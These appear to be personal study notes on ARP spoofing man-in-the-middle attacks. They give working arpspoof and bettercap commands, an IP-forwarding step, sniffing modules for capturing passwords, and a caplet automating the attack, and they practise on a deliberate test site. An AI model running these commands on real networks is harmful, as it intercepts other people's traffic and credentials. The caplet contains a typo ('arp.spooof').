ARP Spoofing

This is a MITM attack…

Test site: http://testphp.vulnweb.com/

To check ARP Tables in Windows or Linux: ``arp -a``

If you get too many entries, grep it:

arp -a | grep ether

Terms:

• ARP: Address Resolution Protocol (maps IP to MAC on a network)
• ARP Request: broadcast to the network requesting MAC of specific IP
• ARP Response: client with that IP responds to requester with its MAC address

Each computer on the network has an ARP table linking IPs with MACs. You use this table to exploit the ARP protocol and set up a MITM spoof.

1. You spoof the IP/MAC of the router: sent to victim. Causes the victim to update its ARP table and accociate my MAC with router's IP
2. You spoof the IP/MAC of the victim: sent to router. Causes the router to update its ARP table and associate my MAC with victim's IP

This effectively puts you in the middle, intercepting traffic between victim and router. The victim thinks you are the router; and the router thinks you are the victim.

Why ARP Spoofing works: Because the protocol itself is not secure…

1. Clients accept responses even if they did not send a request.
2. Cients trust responses without any verification.

So we send an ARP Response to a target and that target will not verify the response. The target will simply update its ARP table with the response I sent it.

Tools: arpspoof, bettercap

• These tools only set up the ARP Spoof and redirect traffic to your computer (the put you as the Man in the Middle).
• After you set this up, you need to capture and anylize the traffic (with something like Wireshark).

Syntax (usage is always the same):

arpspoof -i [interface] -t [clientIP] [gatewayIP]  # spoofs the client, telling him I am the gateway
arpspoof -i [interface] -t [gatewayIP] [clientIP]  # spoofs the gateway, telling him I am the client

Example (as root):

arpspoof -i eth0 -t 192.168.0.216 192.168.0.1
arpspoof -i eth0 -t 192.168.0.1 192.168.0.216

NOTE: You need to enable port forwarding to allow packets to flow through your machine just like a router.

• As root: echo 1 > /proc/sys/net/ipv4/ip_forward

Bettercap can do the same thing as arpspoof and more: docs.

Bettercap is a framework to run network attacks:

• ARP Spoofing (redirect flow of packets through your machine to analyze, change)
• Sniff data (urls, usernames, passwords)
• Bypass HTTPS
• DNS Spoofing (redirect domain requests)
• Inject code in loaded pages

Syntax: bettercap -iface [interface]

That gets in you into the tool. Type help to see a menu and the help [moduleName] to get help on a specific module name you want to use.

• At the top of the help information you get syntax to turn on/off, etc.
• Under that you get Parameters (options for the module). To change:
  • Syntax: set [option to modify] [true | false]
  • Example: set arp.spoof.fullduplex true

Module: net.probe (discover connected clients quickly)

• Turn the module on (at bettercap prompt): net.probe on
• This will also automatically start the net.recon module (type “help” at prompt to confirm)

Module: net.recon

• net.probe sends probe requests to all possible IPs on the network
• net.recon monitors ARP cache to take the responses and add them to a list for me to target
• net.recon has several commands:
  • net.show: Show cache hosts list (default sorting by ip).

Module: arp.spoof (for use, at bettercap prompt: “help arp.spoof”)

• You MUST have net.probe and net.recon running for this to work.

1. Turn on net.probe if it's not on already

net.probe on

2. Change module parameter for full duplex (spoof client and router, both):

set arp.spoof.fullduplex true

3. Change module parameter to add your target client IP (because we set the full-duplex parameter, we do not have to set the gateway, only the client; the gateway/router sets automagically):

set arp.spoof.targets [target IP]
# or
set arp.spoof.targets [target IP],[target IP],[target IP]

4. Turn ARP spoofing on (see “help arp.spoof”) and that's it.

arp.spoof on
help #to see the modules running

NOTE: If you check our arp table in the client you will see the attach machine's MAC associated with the gateway.

5. To sniff the traffic (still using bettercap; later we'll use Wireshark):

help net.sniff # see the options
net.sniff on

Test It: VulnWeb (to generate some traffic)

Caplets are custom scripts for Bettercap (basically text files with commands, one on each line).

How-To:

1. Create a text file
2. On each line put the commands you always run:

Example (to do all the above when you start Bettercap):

net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.0.142
arp.spooof on
net.sniff on

To run it:

bettercap -iface [interface name] -caplet /path/to/caplet.cap